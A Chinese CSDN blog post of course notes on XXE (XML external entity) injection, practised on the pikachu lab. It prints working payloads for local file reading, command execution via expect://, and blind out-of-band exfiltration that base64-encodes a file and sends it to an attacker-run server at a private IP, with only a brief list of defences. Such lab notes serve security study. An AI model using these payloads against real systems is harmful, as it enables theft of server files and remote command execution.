【小迪安全】Day39web漏洞-XXE漏洞

最新推荐文章于 2023-06-07 17:37:28 发布
最新推荐文章于 2023-06-07 17:37:28 发布
阅读量330 收藏 1
点赞数
分类专栏: 小迪安全 渗透测试 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44312640/article/details/127901006
版权

web漏洞-XXE漏洞

文章目录

前言

​ 介绍xxe漏洞原理,防御。xxe漏洞案例演示。思维导图来源:https://www.yuque.com/weiker/xiaodi/uug460

前置知识

​ 看一下别人的文章XXE漏洞详解——基础篇XXE漏洞详解——进阶篇,我这边就不抄过来了。

xxe漏洞原理

​ xxe漏洞的原理是代码开启了外部实体引用但是却没有做好过滤,导致攻击者能够构建恶意xml语句达到攻击目的。

演示案例

pikachu靶场xml

文件读取
<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "file:///d://test.txt">
]>
<x>&xxe;</x>
内网探测
RCE-远程代码执行

​ php环境需要安装expect扩展,我这边用的phpstudy集成环境,没看到这个扩展,故未验证。

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "http://192.168.31.210:8088/evil2.dtd">
		%file;
]>
<x>&send;</x>

//下面的是写入文件的
evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/test.txt">

// evil2.dtd
<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>
无回显利用

​ 原理是自己本地搭建一个网站,xxe漏洞让目标网站带着读取到的数据访问我们的网站,然后我们再在本地日志查看数据即可。

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
		<!ENTITY % dtd SYSTEM "http://192.168.31.210:8088/test.dtd">
		%dtd;
		%send;
]>

//test.dtd,这里的&#x25;是%的编码,因为dtd中不能有%
<!ENTITY % payload
	"<!ENTITY &#x25; send SYSTEM
'http://192.168.31.210:8088/?data=%file;'>"
>
%payload;

xxe漏洞防御方法

禁用外部实体引用

过滤关键字

WAF产品

绕过方法

​ 参考[https://www.cnblogs.com/20175211lyz/p/11413335.html(https://www.cnblogs.com/20175211lyz/p/11413335.html)。

楓椛
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
渗透测试步骤总结(思维导图整理)
haha1314的博客
05-01 3553
渗透测试 一、信息收集 1、域名信息收集 2、服务器、组件(指纹) 3、信息泄露 4、总结 二、漏洞挖掘 1、组件(指纹) 2、服务器 3、应用层 三、漏洞利用 四、权限提升 五、后门 六、日志清扫 七、经验总结 思维导图链接:https://pan.baidu.com/s/1zlh_2D4HCGQ5c6dJ_FFD8w提取码:b21u ...
web漏洞“小安全课堂笔记”XXE&XML
weixin_42902126的博客
03-29 4095
安全课堂笔记XXE&XML思维导图XML XXEXML 与 HTML 的主要差异pikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入xxe-lab 靶场登陆框 xml 数据传输测试-检测发现 思维导图 XML XXE XML 被设计为传输和存储数据,XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从 HTML 分离,是独立于软件和硬件的信息传输工具。XXE 漏洞全称XML External Entity Injection,
xml的xxe漏洞
m0_48907714的博客
04-25 4204
XXE漏洞 XML概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 XML与HTML的主要差异 XML被设计为传输和存储数据,其焦
【小安全】完整详细笔记01-39天
m0_74169008的博客
06-07 2万+
凡是存在文件上传的地方均有可能存在文件上传漏洞,有文件上传就可以测试漏洞;指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。文件上传漏洞的时候看对方的代码是否写的比较完整、安全,疏忽了验证就会造成文件上传漏洞;有文件上传的功能就可以去测试;
安全学习笔记--第39天--XXE和XML之利用检测绕过全解
zr1213159840的博客
02-09 1175
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 DTD 文档类型定义(DTD)可定义合法的XML文档构建模块 它使用一系列合法的元素来.
(2020上半年第28天(其他漏洞--XXE及口令安全))小网络安全笔记
u013630181的博客
12-04 352
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
【XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...
WEB安全之XXE实体注入漏洞.pdf
12-12
【XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储...总之,理解和防范XXE漏洞对于维护Web应用的安全至关重要。开发人员应确保正确处理XML输入,限制XML解析器的功能,并时刻关注最新的安全最佳实践。
105-web漏洞挖掘之XXE漏洞1
08-03
理解并防范XXE漏洞对于保障Web应用程序的安全至关重要,因为它们可能导致严重的信息泄露和系统破坏。通过深入理解XML实体、XML解析器的工作原理以及如何安全地处理XML输入,开发者可以更好地保护他们的应用程序免受...
WebGoat8-xxe注入漏洞分析
最新发布
09-15
Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作...
web安全漏洞挖掘梳理
06-22
Web 安全漏洞挖掘梳理 - XXE 漏洞梳理 Web 安全漏洞挖掘梳理是指在 Web 应用程序中发现和利用安全漏洞的过程。其中,XXE 漏洞是一种常见的安全漏洞,攻击者可以通过构建外部实体注入来攻击 Web 应用程序。 1.什么...
安全笔记(web安全)
m0_57191657的博客
04-20 2049
雀雨网址1.https://www.yuque.com/glan/xiaodisec 2.https://www.yuque.com/weiker/xiaodi
逻辑漏洞思维导图
小小猪的博客
12-20 521
逻辑漏洞思维导图 逻辑漏洞,是因为代码之后是人的逻辑,人更容易犯错,是编写完程序后随着人的思维逻辑产生的不足。sql注入、xss等漏洞可以通过安全框架等避免,这种攻击流量非法,对原始程序进行了破坏,防火墙可以检测,而逻辑漏洞是通过合法合理的方式达到破坏,比如密码找回由于程序设计不足,会产生很多问题,破坏方式并非向程预防思路。 ...
常见的web漏洞思维导图
黑面狐
01-26 2386
XML文件的解析以及XML外部实体注入防护
热门推荐
u013224189的专栏
11-10 3万+
XML外部实体注入 (XXE防护)
.xml外部实体引用
一技旁身
06-01 1万+
一、语法XML声明: XML声明放在XML文档的第一行 XML声明由以下几个部分组成: version:文档符合xml1.0规范,我们学习1.0 encoding:文档字符编码,比如“GB2312”或者“UTF-8” standalone:文档定义是否独立使用“no”为默认值表示不独立(允许使用外部声明),yes表示独立使用(不允许使用外部声明) &lt;?sml version="1.0" ?...
XML外部实体引用(XXE,XML External Entity attack)漏洞原理及其预防
qq_gfq的博客
03-26 5583
0x00 什么是XMLXML 指可扩展标记语言(EXtensible Markup Language),是一种用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。和HTML类似,但HTML被设计来显示数据,XML被设计来传输数据。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。https://mp.csdn....
XXE漏洞复现
春日野穹
10-23 2974
引言~ XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 实验环境~ PHP版本:5.4.45 中间件:apache 复现平台:皮卡丘漏洞练习平台 libXML编译版本:2.7.8 libxm...
XXE漏洞
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
罗海波《Web安全技术》:探索Web应用安全漏洞与防护
Web安全技术》是一本由罗海波讲师编著的关于网络安全的专业书籍,旨在介绍Web安全的基础知识和最新动态。课程起始于2020年9月15日,主要探讨了Web服务在网络中的广泛应用,如HTTP协议在传输文本、图像、文件、音频...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值